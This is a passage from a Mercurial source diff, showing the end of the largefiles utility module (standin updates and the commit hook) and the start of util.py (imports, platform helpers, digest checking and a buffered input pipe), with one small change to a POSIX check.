498 if f[0] not in filelist:
498 if f[0] not in filelist:
499 filelist.append(f[0])
499 filelist.append(f[0])
500 return filelist
500 return filelist
501
501
502 def getlfilestoupload(repo, missing, addfunc):
502 def getlfilestoupload(repo, missing, addfunc):
503 for i, n in enumerate(missing):
503 for i, n in enumerate(missing):
504 repo.ui.progress(_('finding outgoing largefiles'), i,
504 repo.ui.progress(_('finding outgoing largefiles'), i,
505 unit=_('revisions'), total=len(missing))
505 unit=_('revisions'), total=len(missing))
506 parents = [p for p in repo[n].parents() if p != node.nullid]
506 parents = [p for p in repo[n].parents() if p != node.nullid]
507
507
508 oldlfstatus = repo.lfstatus
508 oldlfstatus = repo.lfstatus
509 repo.lfstatus = False
509 repo.lfstatus = False
510 try:
510 try:
511 ctx = repo[n]
511 ctx = repo[n]
512 finally:
512 finally:
513 repo.lfstatus = oldlfstatus
513 repo.lfstatus = oldlfstatus
514
514
515 files = set(ctx.files())
515 files = set(ctx.files())
516 if len(parents) == 2:
516 if len(parents) == 2:
517 mc = ctx.manifest()
517 mc = ctx.manifest()
518 mp1 = ctx.parents()[0].manifest()
518 mp1 = ctx.parents()[0].manifest()
519 mp2 = ctx.parents()[1].manifest()
519 mp2 = ctx.parents()[1].manifest()
520 for f in mp1:
520 for f in mp1:
521 if f not in mc:
521 if f not in mc:
522 files.add(f)
522 files.add(f)
523 for f in mp2:
523 for f in mp2:
524 if f not in mc:
524 if f not in mc:
525 files.add(f)
525 files.add(f)
526 for f in mc:
526 for f in mc:
527 if mc[f] != mp1.get(f, None) or mc[f] != mp2.get(f, None):
527 if mc[f] != mp1.get(f, None) or mc[f] != mp2.get(f, None):
528 files.add(f)
528 files.add(f)
529 for fn in files:
529 for fn in files:
530 if isstandin(fn) and fn in ctx:
530 if isstandin(fn) and fn in ctx:
531 addfunc(fn, readasstandin(ctx[fn]))
531 addfunc(fn, readasstandin(ctx[fn]))
532 repo.ui.progress(_('finding outgoing largefiles'), None)
532 repo.ui.progress(_('finding outgoing largefiles'), None)
533
533
534 def updatestandinsbymatch(repo, match):
534 def updatestandinsbymatch(repo, match):
535 '''Update standins in the working directory according to specified match
535 '''Update standins in the working directory according to specified match
536
536
537 This returns (possibly modified) ``match`` object to be used for
537 This returns (possibly modified) ``match`` object to be used for
538 subsequent commit process.
538 subsequent commit process.
539 '''
539 '''
540
540
541 ui = repo.ui
541 ui = repo.ui
542
542
543 # Case 1: user calls commit with no specific files or
543 # Case 1: user calls commit with no specific files or
544 # include/exclude patterns: refresh and commit all files that
544 # include/exclude patterns: refresh and commit all files that
545 # are "dirty".
545 # are "dirty".
546 if match is None or match.always():
546 if match is None or match.always():
547 # Spend a bit of time here to get a list of files we know
547 # Spend a bit of time here to get a list of files we know
548 # are modified so we can compare only against those.
548 # are modified so we can compare only against those.
549 # It can cost a lot of time (several seconds)
549 # It can cost a lot of time (several seconds)
550 # otherwise to update all standins if the largefiles are
550 # otherwise to update all standins if the largefiles are
551 # large.
551 # large.
552 lfdirstate = openlfdirstate(ui, repo)
552 lfdirstate = openlfdirstate(ui, repo)
553 dirtymatch = matchmod.always(repo.root, repo.getcwd())
553 dirtymatch = matchmod.always(repo.root, repo.getcwd())
554 unsure, s = lfdirstate.status(dirtymatch, subrepos=[], ignored=False,
554 unsure, s = lfdirstate.status(dirtymatch, subrepos=[], ignored=False,
555 clean=False, unknown=False)
555 clean=False, unknown=False)
556 modifiedfiles = unsure + s.modified + s.added + s.removed
556 modifiedfiles = unsure + s.modified + s.added + s.removed
557 lfiles = listlfiles(repo)
557 lfiles = listlfiles(repo)
558 # this only loops through largefiles that exist (not
558 # this only loops through largefiles that exist (not
559 # removed/renamed)
559 # removed/renamed)
560 for lfile in lfiles:
560 for lfile in lfiles:
561 if lfile in modifiedfiles:
561 if lfile in modifiedfiles:
562 fstandin = standin(lfile)
562 fstandin = standin(lfile)
563 if repo.wvfs.exists(fstandin):
563 if repo.wvfs.exists(fstandin):
564 # this handles the case where a rebase is being
564 # this handles the case where a rebase is being
565 # performed and the working copy is not updated
565 # performed and the working copy is not updated
566 # yet.
566 # yet.
567 if repo.wvfs.exists(lfile):
567 if repo.wvfs.exists(lfile):
568 updatestandin(repo, lfile, fstandin)
568 updatestandin(repo, lfile, fstandin)
569
569
570 return match
570 return match
571
571
572 lfiles = listlfiles(repo)
572 lfiles = listlfiles(repo)
573 match._files = repo._subdirlfs(match.files(), lfiles)
573 match._files = repo._subdirlfs(match.files(), lfiles)
574
574
575 # Case 2: user calls commit with specified patterns: refresh
575 # Case 2: user calls commit with specified patterns: refresh
576 # any matching big files.
576 # any matching big files.
577 smatcher = composestandinmatcher(repo, match)
577 smatcher = composestandinmatcher(repo, match)
578 standins = repo.dirstate.walk(smatcher, subrepos=[], unknown=False,
578 standins = repo.dirstate.walk(smatcher, subrepos=[], unknown=False,
579 ignored=False)
579 ignored=False)
580
580
581 # No matching big files: get out of the way and pass control to
581 # No matching big files: get out of the way and pass control to
582 # the usual commit() method.
582 # the usual commit() method.
583 if not standins:
583 if not standins:
584 return match
584 return match
585
585
586 # Refresh all matching big files. It's possible that the
586 # Refresh all matching big files. It's possible that the
587 # commit will end up failing, in which case the big files will
587 # commit will end up failing, in which case the big files will
588 # stay refreshed. No harm done: the user modified them and
588 # stay refreshed. No harm done: the user modified them and
589 # asked to commit them, so sooner or later we're going to
589 # asked to commit them, so sooner or later we're going to
590 # refresh the standins. Might as well leave them refreshed.
590 # refresh the standins. Might as well leave them refreshed.
591 lfdirstate = openlfdirstate(ui, repo)
591 lfdirstate = openlfdirstate(ui, repo)
592 for fstandin in standins:
592 for fstandin in standins:
593 lfile = splitstandin(fstandin)
593 lfile = splitstandin(fstandin)
594 if lfdirstate[lfile] != 'r':
594 if lfdirstate[lfile] != 'r':
595 updatestandin(repo, lfile, fstandin)
595 updatestandin(repo, lfile, fstandin)
596
596
597 # Cook up a new matcher that only matches regular files or
597 # Cook up a new matcher that only matches regular files or
598 # standins corresponding to the big files requested by the
598 # standins corresponding to the big files requested by the
599 # user. Have to modify _files to prevent commit() from
599 # user. Have to modify _files to prevent commit() from
600 # complaining "not tracked" for big files.
600 # complaining "not tracked" for big files.
601 match = copy.copy(match)
601 match = copy.copy(match)
602 origmatchfn = match.matchfn
602 origmatchfn = match.matchfn
603
603
604 # Check both the list of largefiles and the list of
604 # Check both the list of largefiles and the list of
605 # standins because if a largefile was removed, it
605 # standins because if a largefile was removed, it
606 # won't be in the list of largefiles at this point
606 # won't be in the list of largefiles at this point
607 match._files += sorted(standins)
607 match._files += sorted(standins)
608
608
609 actualfiles = []
609 actualfiles = []
610 for f in match._files:
610 for f in match._files:
611 fstandin = standin(f)
611 fstandin = standin(f)
612
612
613 # For largefiles, only one of the normal and standin should be
613 # For largefiles, only one of the normal and standin should be
614 # committed (except if one of them is a remove). In the case of a
614 # committed (except if one of them is a remove). In the case of a
615 # standin removal, drop the normal file if it is unknown to dirstate.
615 # standin removal, drop the normal file if it is unknown to dirstate.
616 # Thus, skip plain largefile names but keep the standin.
616 # Thus, skip plain largefile names but keep the standin.
617 if f in lfiles or fstandin in standins:
617 if f in lfiles or fstandin in standins:
618 if repo.dirstate[fstandin] != 'r':
618 if repo.dirstate[fstandin] != 'r':
619 if repo.dirstate[f] != 'r':
619 if repo.dirstate[f] != 'r':
620 continue
620 continue
621 elif repo.dirstate[f] == '?':
621 elif repo.dirstate[f] == '?':
622 continue
622 continue
623
623
624 actualfiles.append(f)
624 actualfiles.append(f)
625 match._files = actualfiles
625 match._files = actualfiles
626
626
627 def matchfn(f):
627 def matchfn(f):
628 if origmatchfn(f):
628 if origmatchfn(f):
629 return f not in lfiles
629 return f not in lfiles
630 else:
630 else:
631 return f in standins
631 return f in standins
632
632
633 match.matchfn = matchfn
633 match.matchfn = matchfn
634
634
635 return match
635 return match
636
636
637 class automatedcommithook(object):
637 class automatedcommithook(object):
638 '''Stateful hook to update standins at the 1st commit of resuming
638 '''Stateful hook to update standins at the 1st commit of resuming
639
639
640 For efficiency, updating standins in the working directory should
640 For efficiency, updating standins in the working directory should
641 be avoided while automated committing (like rebase, transplant and
641 be avoided while automated committing (like rebase, transplant and
642 so on), because they should be updated before committing.
642 so on), because they should be updated before committing.
643
643
644 But the 1st commit of resuming automated committing (e.g. ``rebase
644 But the 1st commit of resuming automated committing (e.g. ``rebase
645 --continue``) should update them, because largefiles may be
645 --continue``) should update them, because largefiles may be
646 modified manually.
646 modified manually.
647 '''
647 '''
648 def __init__(self, resuming):
648 def __init__(self, resuming):
649 self.resuming = resuming
649 self.resuming = resuming
650
650
651 def __call__(self, repo, match):
651 def __call__(self, repo, match):
652 if self.resuming:
652 if self.resuming:
653 self.resuming = False # avoids updating at subsequent commits
653 self.resuming = False # avoids updating at subsequent commits
654 return updatestandinsbymatch(repo, match)
654 return updatestandinsbymatch(repo, match)
655 else:
655 else:
656 return match
656 return match
657
657
658 def getstatuswriter(ui, repo, forcibly=None):
658 def getstatuswriter(ui, repo, forcibly=None):
659 '''Return the function to write largefiles specific status out
659 '''Return the function to write largefiles specific status out
660
660
661 If ``forcibly`` is ``None``, this returns the last element of
661 If ``forcibly`` is ``None``, this returns the last element of
662 ``repo._lfstatuswriters`` as "default" writer function.
662 ``repo._lfstatuswriters`` as "default" writer function.
663
663
664 Otherwise, this returns the function to always write out (or
664 Otherwise, this returns the function to always write out (or
665 ignore if ``not forcibly``) status.
665 ignore if ``not forcibly``) status.
666 '''
666 '''
667 if forcibly is None and util.safehasattr(repo, '_largefilesenabled'):
667 if forcibly is None and util.safehasattr(repo, '_largefilesenabled'):
668 return repo._lfstatuswriters[-1]
668 return repo._lfstatuswriters[-1]
669 else:
669 else:
670 if forcibly:
670 if forcibly:
671 return ui.status # forcibly WRITE OUT
671 return ui.status # forcibly WRITE OUT
672 else:
672 else:
673 return lambda *msg, **opts: None # forcibly IGNORE
673 return lambda *msg, **opts: None # forcibly IGNORE
@@ -1,3861 +1,3861 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import calendar
20 import calendar
21 import codecs
21 import codecs
22 import collections
22 import collections
23 import contextlib
23 import contextlib
24 import datetime
24 import datetime
25 import errno
25 import errno
26 import gc
26 import gc
27 import hashlib
27 import hashlib
28 import imp
28 import imp
29 import itertools
29 import itertools
30 import mmap
30 import mmap
31 import os
31 import os
32 import platform as pyplatform
32 import platform as pyplatform
33 import re as remod
33 import re as remod
34 import shutil
34 import shutil
35 import signal
35 import signal
36 import socket
36 import socket
37 import stat
37 import stat
38 import string
38 import string
39 import subprocess
39 import subprocess
40 import sys
40 import sys
41 import tempfile
41 import tempfile
42 import textwrap
42 import textwrap
43 import time
43 import time
44 import traceback
44 import traceback
45 import warnings
45 import warnings
46 import zlib
46 import zlib
47
47
48 from . import (
48 from . import (
49 encoding,
49 encoding,
50 error,
50 error,
51 i18n,
51 i18n,
52 policy,
52 policy,
53 pycompat,
53 pycompat,
54 urllibcompat,
54 urllibcompat,
55 )
55 )
56
56
57 base85 = policy.importmod(r'base85')
57 base85 = policy.importmod(r'base85')
58 osutil = policy.importmod(r'osutil')
58 osutil = policy.importmod(r'osutil')
59 parsers = policy.importmod(r'parsers')
59 parsers = policy.importmod(r'parsers')
60
60
61 b85decode = base85.b85decode
61 b85decode = base85.b85decode
62 b85encode = base85.b85encode
62 b85encode = base85.b85encode
63
63
64 cookielib = pycompat.cookielib
64 cookielib = pycompat.cookielib
65 empty = pycompat.empty
65 empty = pycompat.empty
66 httplib = pycompat.httplib
66 httplib = pycompat.httplib
67 pickle = pycompat.pickle
67 pickle = pycompat.pickle
68 queue = pycompat.queue
68 queue = pycompat.queue
69 socketserver = pycompat.socketserver
69 socketserver = pycompat.socketserver
70 stderr = pycompat.stderr
70 stderr = pycompat.stderr
71 stdin = pycompat.stdin
71 stdin = pycompat.stdin
72 stdout = pycompat.stdout
72 stdout = pycompat.stdout
73 stringio = pycompat.stringio
73 stringio = pycompat.stringio
74 xmlrpclib = pycompat.xmlrpclib
74 xmlrpclib = pycompat.xmlrpclib
75
75
76 httpserver = urllibcompat.httpserver
76 httpserver = urllibcompat.httpserver
77 urlerr = urllibcompat.urlerr
77 urlerr = urllibcompat.urlerr
78 urlreq = urllibcompat.urlreq
78 urlreq = urllibcompat.urlreq
79
79
80 # workaround for win32mbcs
80 # workaround for win32mbcs
81 _filenamebytestr = pycompat.bytestr
81 _filenamebytestr = pycompat.bytestr
82
82
83 def isatty(fp):
83 def isatty(fp):
84 try:
84 try:
85 return fp.isatty()
85 return fp.isatty()
86 except AttributeError:
86 except AttributeError:
87 return False
87 return False
88
88
89 # glibc determines buffering on first write to stdout - if we replace a TTY
89 # glibc determines buffering on first write to stdout - if we replace a TTY
90 # destined stdout with a pipe destined stdout (e.g. pager), we want line
90 # destined stdout with a pipe destined stdout (e.g. pager), we want line
91 # buffering
91 # buffering
92 if isatty(stdout):
92 if isatty(stdout):
93 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
93 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
94
94
95 if pycompat.iswindows:
95 if pycompat.iswindows:
96 from . import windows as platform
96 from . import windows as platform
97 stdout = platform.winstdout(stdout)
97 stdout = platform.winstdout(stdout)
98 else:
98 else:
99 from . import posix as platform
99 from . import posix as platform
100
100
101 _ = i18n._
101 _ = i18n._
102
102
103 bindunixsocket = platform.bindunixsocket
103 bindunixsocket = platform.bindunixsocket
104 cachestat = platform.cachestat
104 cachestat = platform.cachestat
105 checkexec = platform.checkexec
105 checkexec = platform.checkexec
106 checklink = platform.checklink
106 checklink = platform.checklink
107 copymode = platform.copymode
107 copymode = platform.copymode
108 executablepath = platform.executablepath
108 executablepath = platform.executablepath
109 expandglobs = platform.expandglobs
109 expandglobs = platform.expandglobs
110 explainexit = platform.explainexit
110 explainexit = platform.explainexit
111 findexe = platform.findexe
111 findexe = platform.findexe
112 gethgcmd = platform.gethgcmd
112 gethgcmd = platform.gethgcmd
113 getuser = platform.getuser
113 getuser = platform.getuser
114 getpid = os.getpid
114 getpid = os.getpid
115 groupmembers = platform.groupmembers
115 groupmembers = platform.groupmembers
116 groupname = platform.groupname
116 groupname = platform.groupname
117 hidewindow = platform.hidewindow
117 hidewindow = platform.hidewindow
118 isexec = platform.isexec
118 isexec = platform.isexec
119 isowner = platform.isowner
119 isowner = platform.isowner
120 listdir = osutil.listdir
120 listdir = osutil.listdir
121 localpath = platform.localpath
121 localpath = platform.localpath
122 lookupreg = platform.lookupreg
122 lookupreg = platform.lookupreg
123 makedir = platform.makedir
123 makedir = platform.makedir
124 nlinks = platform.nlinks
124 nlinks = platform.nlinks
125 normpath = platform.normpath
125 normpath = platform.normpath
126 normcase = platform.normcase
126 normcase = platform.normcase
127 normcasespec = platform.normcasespec
127 normcasespec = platform.normcasespec
128 normcasefallback = platform.normcasefallback
128 normcasefallback = platform.normcasefallback
129 openhardlinks = platform.openhardlinks
129 openhardlinks = platform.openhardlinks
130 oslink = platform.oslink
130 oslink = platform.oslink
131 parsepatchoutput = platform.parsepatchoutput
131 parsepatchoutput = platform.parsepatchoutput
132 pconvert = platform.pconvert
132 pconvert = platform.pconvert
133 poll = platform.poll
133 poll = platform.poll
134 popen = platform.popen
134 popen = platform.popen
135 posixfile = platform.posixfile
135 posixfile = platform.posixfile
136 quotecommand = platform.quotecommand
136 quotecommand = platform.quotecommand
137 readpipe = platform.readpipe
137 readpipe = platform.readpipe
138 rename = platform.rename
138 rename = platform.rename
139 removedirs = platform.removedirs
139 removedirs = platform.removedirs
140 samedevice = platform.samedevice
140 samedevice = platform.samedevice
141 samefile = platform.samefile
141 samefile = platform.samefile
142 samestat = platform.samestat
142 samestat = platform.samestat
143 setbinary = platform.setbinary
143 setbinary = platform.setbinary
144 setflags = platform.setflags
144 setflags = platform.setflags
145 setsignalhandler = platform.setsignalhandler
145 setsignalhandler = platform.setsignalhandler
146 shellquote = platform.shellquote
146 shellquote = platform.shellquote
147 spawndetached = platform.spawndetached
147 spawndetached = platform.spawndetached
148 split = platform.split
148 split = platform.split
149 sshargs = platform.sshargs
149 sshargs = platform.sshargs
150 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
150 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
151 statisexec = platform.statisexec
151 statisexec = platform.statisexec
152 statislink = platform.statislink
152 statislink = platform.statislink
153 testpid = platform.testpid
153 testpid = platform.testpid
154 umask = platform.umask
154 umask = platform.umask
155 unlink = platform.unlink
155 unlink = platform.unlink
156 username = platform.username
156 username = platform.username
157
157
158 try:
158 try:
159 recvfds = osutil.recvfds
159 recvfds = osutil.recvfds
160 except AttributeError:
160 except AttributeError:
161 pass
161 pass
162 try:
162 try:
163 setprocname = osutil.setprocname
163 setprocname = osutil.setprocname
164 except AttributeError:
164 except AttributeError:
165 pass
165 pass
166
166
167 # Python compatibility
167 # Python compatibility
168
168
169 _notset = object()
169 _notset = object()
170
170
171 # disable Python's problematic floating point timestamps (issue4836)
171 # disable Python's problematic floating point timestamps (issue4836)
172 # (Python hypocritically says you shouldn't change this behavior in
172 # (Python hypocritically says you shouldn't change this behavior in
173 # libraries, and sure enough Mercurial is not a library.)
173 # libraries, and sure enough Mercurial is not a library.)
174 os.stat_float_times(False)
174 os.stat_float_times(False)
175
175
176 def safehasattr(thing, attr):
176 def safehasattr(thing, attr):
177 return getattr(thing, attr, _notset) is not _notset
177 return getattr(thing, attr, _notset) is not _notset
178
178
179 def bytesinput(fin, fout, *args, **kwargs):
179 def bytesinput(fin, fout, *args, **kwargs):
180 sin, sout = sys.stdin, sys.stdout
180 sin, sout = sys.stdin, sys.stdout
181 try:
181 try:
182 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
182 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
183 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
183 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
184 finally:
184 finally:
185 sys.stdin, sys.stdout = sin, sout
185 sys.stdin, sys.stdout = sin, sout
186
186
187 def bitsfrom(container):
187 def bitsfrom(container):
188 bits = 0
188 bits = 0
189 for bit in container:
189 for bit in container:
190 bits |= bit
190 bits |= bit
191 return bits
191 return bits
192
192
193 # python 2.6 still have deprecation warning enabled by default. We do not want
193 # python 2.6 still have deprecation warning enabled by default. We do not want
194 # to display anything to standard user so detect if we are running test and
194 # to display anything to standard user so detect if we are running test and
195 # only use python deprecation warning in this case.
195 # only use python deprecation warning in this case.
196 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
196 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
197 if _dowarn:
197 if _dowarn:
198 # explicitly unfilter our warning for python 2.7
198 # explicitly unfilter our warning for python 2.7
199 #
199 #
200 # The option of setting PYTHONWARNINGS in the test runner was investigated.
200 # The option of setting PYTHONWARNINGS in the test runner was investigated.
201 # However, module name set through PYTHONWARNINGS was exactly matched, so
201 # However, module name set through PYTHONWARNINGS was exactly matched, so
202 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
202 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
203 # makes the whole PYTHONWARNINGS thing useless for our usecase.
203 # makes the whole PYTHONWARNINGS thing useless for our usecase.
204 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
204 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
205 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
205 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
206 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
206 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
207
207
208 def nouideprecwarn(msg, version, stacklevel=1):
208 def nouideprecwarn(msg, version, stacklevel=1):
209 """Issue an python native deprecation warning
209 """Issue an python native deprecation warning
210
210
211 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
211 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
212 """
212 """
213 if _dowarn:
213 if _dowarn:
214 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
214 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
215 " update your code.)") % version
215 " update your code.)") % version
216 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
216 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
217
217
218 DIGESTS = {
218 DIGESTS = {
219 'md5': hashlib.md5,
219 'md5': hashlib.md5,
220 'sha1': hashlib.sha1,
220 'sha1': hashlib.sha1,
221 'sha512': hashlib.sha512,
221 'sha512': hashlib.sha512,
222 }
222 }
223 # List of digest types from strongest to weakest
223 # List of digest types from strongest to weakest
224 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
224 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
225
225
226 for k in DIGESTS_BY_STRENGTH:
226 for k in DIGESTS_BY_STRENGTH:
227 assert k in DIGESTS
227 assert k in DIGESTS
228
228
229 class digester(object):
229 class digester(object):
230 """helper to compute digests.
230 """helper to compute digests.
231
231
232 This helper can be used to compute one or more digests given their name.
232 This helper can be used to compute one or more digests given their name.
233
233
234 >>> d = digester([b'md5', b'sha1'])
234 >>> d = digester([b'md5', b'sha1'])
235 >>> d.update(b'foo')
235 >>> d.update(b'foo')
236 >>> [k for k in sorted(d)]
236 >>> [k for k in sorted(d)]
237 ['md5', 'sha1']
237 ['md5', 'sha1']
238 >>> d[b'md5']
238 >>> d[b'md5']
239 'acbd18db4cc2f85cedef654fccc4a4d8'
239 'acbd18db4cc2f85cedef654fccc4a4d8'
240 >>> d[b'sha1']
240 >>> d[b'sha1']
241 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
241 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
242 >>> digester.preferred([b'md5', b'sha1'])
242 >>> digester.preferred([b'md5', b'sha1'])
243 'sha1'
243 'sha1'
244 """
244 """
245
245
246 def __init__(self, digests, s=''):
246 def __init__(self, digests, s=''):
247 self._hashes = {}
247 self._hashes = {}
248 for k in digests:
248 for k in digests:
249 if k not in DIGESTS:
249 if k not in DIGESTS:
250 raise Abort(_('unknown digest type: %s') % k)
250 raise Abort(_('unknown digest type: %s') % k)
251 self._hashes[k] = DIGESTS[k]()
251 self._hashes[k] = DIGESTS[k]()
252 if s:
252 if s:
253 self.update(s)
253 self.update(s)
254
254
255 def update(self, data):
255 def update(self, data):
256 for h in self._hashes.values():
256 for h in self._hashes.values():
257 h.update(data)
257 h.update(data)
258
258
259 def __getitem__(self, key):
259 def __getitem__(self, key):
260 if key not in DIGESTS:
260 if key not in DIGESTS:
261 raise Abort(_('unknown digest type: %s') % k)
261 raise Abort(_('unknown digest type: %s') % k)
262 return self._hashes[key].hexdigest()
262 return self._hashes[key].hexdigest()
263
263
264 def __iter__(self):
264 def __iter__(self):
265 return iter(self._hashes)
265 return iter(self._hashes)
266
266
267 @staticmethod
267 @staticmethod
268 def preferred(supported):
268 def preferred(supported):
269 """returns the strongest digest type in both supported and DIGESTS."""
269 """returns the strongest digest type in both supported and DIGESTS."""
270
270
271 for k in DIGESTS_BY_STRENGTH:
271 for k in DIGESTS_BY_STRENGTH:
272 if k in supported:
272 if k in supported:
273 return k
273 return k
274 return None
274 return None
275
275
276 class digestchecker(object):
276 class digestchecker(object):
277 """file handle wrapper that additionally checks content against a given
277 """file handle wrapper that additionally checks content against a given
278 size and digests.
278 size and digests.
279
279
280 d = digestchecker(fh, size, {'md5': '...'})
280 d = digestchecker(fh, size, {'md5': '...'})
281
281
282 When multiple digests are given, all of them are validated.
282 When multiple digests are given, all of them are validated.
283 """
283 """
284
284
285 def __init__(self, fh, size, digests):
285 def __init__(self, fh, size, digests):
286 self._fh = fh
286 self._fh = fh
287 self._size = size
287 self._size = size
288 self._got = 0
288 self._got = 0
289 self._digests = dict(digests)
289 self._digests = dict(digests)
290 self._digester = digester(self._digests.keys())
290 self._digester = digester(self._digests.keys())
291
291
292 def read(self, length=-1):
292 def read(self, length=-1):
293 content = self._fh.read(length)
293 content = self._fh.read(length)
294 self._digester.update(content)
294 self._digester.update(content)
295 self._got += len(content)
295 self._got += len(content)
296 return content
296 return content
297
297
298 def validate(self):
298 def validate(self):
299 if self._size != self._got:
299 if self._size != self._got:
300 raise Abort(_('size mismatch: expected %d, got %d') %
300 raise Abort(_('size mismatch: expected %d, got %d') %
301 (self._size, self._got))
301 (self._size, self._got))
302 for k, v in self._digests.items():
302 for k, v in self._digests.items():
303 if v != self._digester[k]:
303 if v != self._digester[k]:
304 # i18n: first parameter is a digest name
304 # i18n: first parameter is a digest name
305 raise Abort(_('%s mismatch: expected %s, got %s') %
305 raise Abort(_('%s mismatch: expected %s, got %s') %
306 (k, v, self._digester[k]))
306 (k, v, self._digester[k]))
307
307
308 try:
308 try:
309 buffer = buffer
309 buffer = buffer
310 except NameError:
310 except NameError:
311 def buffer(sliceable, offset=0, length=None):
311 def buffer(sliceable, offset=0, length=None):
312 if length is not None:
312 if length is not None:
313 return memoryview(sliceable)[offset:offset + length]
313 return memoryview(sliceable)[offset:offset + length]
314 return memoryview(sliceable)[offset:]
314 return memoryview(sliceable)[offset:]
315
315
316 closefds = pycompat.osname == 'posix'
316 closefds = pycompat.isposix
317
317
318 _chunksize = 4096
318 _chunksize = 4096
319
319
320 class bufferedinputpipe(object):
320 class bufferedinputpipe(object):
321 """a manually buffered input pipe
321 """a manually buffered input pipe
322
322
323 Python will not let us use buffered IO and lazy reading with 'polling' at
323 Python will not let us use buffered IO and lazy reading with 'polling' at
324 the same time. We cannot probe the buffer state and select will not detect
324 the same time. We cannot probe the buffer state and select will not detect
325 that data are ready to read if they are already buffered.
325 that data are ready to read if they are already buffered.
326
326
327 This class let us work around that by implementing its own buffering
327 This class let us work around that by implementing its own buffering
328 (allowing efficient readline) while offering a way to know if the buffer is
328 (allowing efficient readline) while offering a way to know if the buffer is
329 empty from the output (allowing collaboration of the buffer with polling).
329 empty from the output (allowing collaboration of the buffer with polling).
330
330
331 This class lives in the 'util' module because it makes use of the 'os'
331 This class lives in the 'util' module because it makes use of the 'os'
332 module from the python stdlib.
332 module from the python stdlib.
333 """
333 """
334
334
335 def __init__(self, input):
335 def __init__(self, input):
336 self._input = input
336 self._input = input
337 self._buffer = []
337 self._buffer = []
338 self._eof = False
338 self._eof = False
339 self._lenbuf = 0
339 self._lenbuf = 0
340
340
341 @property
341 @property
342 def hasbuffer(self):
342 def hasbuffer(self):
343 """True is any data is currently buffered
343 """True is any data is currently buffered
344
344
345 This will be used externally a pre-step for polling IO. If there is
345 This will be used externally a pre-step for polling IO. If there is
346 already data then no polling should be set in place."""
346 already data then no polling should be set in place."""
347 return bool(self._buffer)
347 return bool(self._buffer)
348
348
349 @property
349 @property
350 def closed(self):
350 def closed(self):
351 return self._input.closed
351 return self._input.closed
352
352
353 def fileno(self):
353 def fileno(self):
354 return self._input.fileno()
354 return self._input.fileno()
355
355
356 def close(self):
356 def close(self):
357 return self._input.close()
357 return self._input.close()
358
358
359 def read(self, size):
359 def read(self, size):
360 while (not self._eof) and (self._lenbuf < size):
360 while (not self._eof) and (self._lenbuf < size):
361 self._fillbuffer()
361 self._fillbuffer()
362 return self._frombuffer(size)
362 return self._frombuffer(size)
363
363
364 def readline(self, *args, **kwargs):
364 def readline(self, *args, **kwargs):
365 if 1 < len(self._buffer):
365 if 1 < len(self._buffer):
366 # this should not happen because both read and readline end with a
366 # this should not happen because both read and readline end with a
367 # _frombuffer call that collapse it.
367 # _frombuffer call that collapse it.
368 self._buffer = [''.join(self._buffer)]
368 self._buffer = [''.join(self._buffer)]
369 self._lenbuf = len(self._buffer[0])
369 self._lenbuf = len(self._buffer[0])
370 lfi = -1
370 lfi = -1
371 if self._buffer:
371 if self._buffer:
372 lfi = self._buffer[-1].find('\n')
372 lfi = self._buffer[-1].find('\n')
373 while (not self._eof) and lfi < 0:
373 while (not self._eof) and lfi < 0:
374 self._fillbuffer()
374 self._fillbuffer()
375 if self._buffer:
375 if self._buffer:
376 lfi = self._buffer[-1].find('\n')
376 lfi = self._buffer[-1].find('\n')
377 size = lfi + 1
377 size = lfi + 1
378 if lfi < 0: # end of file
378 if lfi < 0: # end of file
379 size = self._lenbuf
379 size = self._lenbuf
380 elif 1 < len(self._buffer):
380 elif 1 < len(self._buffer):
381 # we need to take previous chunks into account
381 # we need to take previous chunks into account
382 size += self._lenbuf - len(self._buffer[-1])
382 size += self._lenbuf - len(self._buffer[-1])
383 return self._frombuffer(size)
383 return self._frombuffer(size)
384
384
385 def _frombuffer(self, size):
385 def _frombuffer(self, size):
